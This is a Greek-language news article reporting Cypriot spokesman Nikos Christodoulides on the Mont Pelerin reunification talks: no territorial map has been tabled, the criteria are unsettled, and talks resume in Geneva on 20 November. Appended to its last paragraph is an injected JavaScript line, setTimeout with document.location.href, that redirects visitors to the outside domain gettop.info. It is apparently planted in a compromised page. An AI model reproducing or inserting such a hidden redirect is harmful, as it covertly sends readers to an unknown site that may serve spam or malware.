Χριστοδουλίδης: Δεν έχουν συμφωνηθεί τα κριτήρια» για το εδαφικό

0
17

 

H ελληνοκυπριακή πλευρά θα δώσει «πράσινο φως» για πολυμερή διάσκεψη «μόνο στην περίπτωση που υπάρξει συμφωνημένος χάρτης», τόνισε σήμερα ο Κύπριος κυβερνητικός εκπρόσωπος, Νίκος Χριστοδουλίδης.

Ακόμη δήλωσε ότι ο στόχος είναι να υπάρξει συμφωνία επί των κριτηρίων, τα οποία, όπως είχε πει και σε συνέντευξη στο Αθηναϊκό Πρακτορείο, να «αποτυπωθούν σε πολύ συγκεκριμένο χάρτη». Επεσήμανε πως «σε όλα τα θέματα, που αφορούν τα κριτήρια δεν υπήρξε κατάληξη». Αν υπήρχε κατάληξη, θα γίνονταν και σχετικές ανακοινώσεις, εξήγησε.

Η διεθνής διάσκεψη, τόνισε ο κ. Χριστοδουλίδης, θα πρέπει, «να γίνει στο «παρά ένα» της λύσης, γιατί πρέπει να έχουμε πιθανότητες επιτυχίας για να μπορεί να συγκληθεί».

Ο κ. Χριστοδουλίδης έκανε σαφές πως στο Μοντ Πελεράν δεν έχει τεθεί χάρτης, καθώς «δεν έχουν συμφωνηθεί τα κριτήρια» για το εδαφικό. Δεν έχει τεθεί στο τραπέζι , πρόσθεσε, «οποιοσδήποτε χάρτης, είτε από τη μια είτε από την άλλη πλευρά».

Όπως διευκρίνισε ο κ. Χριστοδουλίδης «υπήρξε μεν πρόοδος σε όλα τα κεφάλαια, αλλά υπάρχουν ακόμη θέματα που πρέπει να συζητηθούν περαιτέρω (…) θα πρέπει να γίνει εις βάθος ανταλλαγή απόψεων». Ο πρόεδρος Αναστασιάδης «θα ενημερώσει όπως είχε υποσχεθεί τους αρχηγούς των κομμάτων», σημείωσε.

Σύμφωνα με τον Κύπριο κυβερνητικό εκπρόσωπο, στις διαπραγματεύσεις στο Μοντ Πελεράν της Ελβετίας από την 7η μέχρι την 11η Νοεμβρίου «υπήρξε εποικοδομητικός διάλογος ανάμεσα στους δύο ηγέτες, που οδήγησε σε πρόοδο στα θέματα που έχουν συζητηθεί». Επειδή ο διάλογος δεν έχει ολοκληρωθεί «ο Πρόεδρος της Δημοκρατίας εισηγήθηκε αναβολή μίας βδομάδας και την επανέναρξη των συζητήσεων στη Γενεύη την ερχόμενη Κυριακή (20ή Νοεμβρίου)», σημείωσε ο κ. Χριστοδουλίδης. Ο νέος κύκλος των διαπραγματεύσεων, που θα γίνουν πάλι στην Ελβετία, θα διαρκέσει πιθανόν τρεις μέρες.

Ερωτηθείς αν υπήρξαν προβλήματα στη διαδικασία, ο κ. Χριστοδουλίδης εξήγησε πως δεν υπήρχε κανένα πρόβλημα και πως «για πρώτη φορά συζητήθηκαν πτυχές του Κυπριακού, που συνδέονται άμεσα με τις εδαφικές προσαρμογές που αναμένεται να γίνουν στο πλαίσιο λύσης του Κυπριακού». Αν και υπήρξε «αξιοσημείωτη πρόοδος», σύμφωνα με τον κ. Χριστοδουλίδη, «ο διάλογος έφτασε σε ένα σημείο και δεν υπήρξε το αναμενόμενο αποτέλεσμα γι αυτό και έχει αποφασιστεί να συνεχιστεί η προσπάθεια» την 20ή Νοεμβρίου.

«Εάν ούτε στην Γενεύη υπάρξει κατάληξη επί του εδαφικού, τότε ο στόχος για λύση εντός του 2016 απομακρύνεται», επεσήμανε ο κ. Χριστοδουλίδης. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here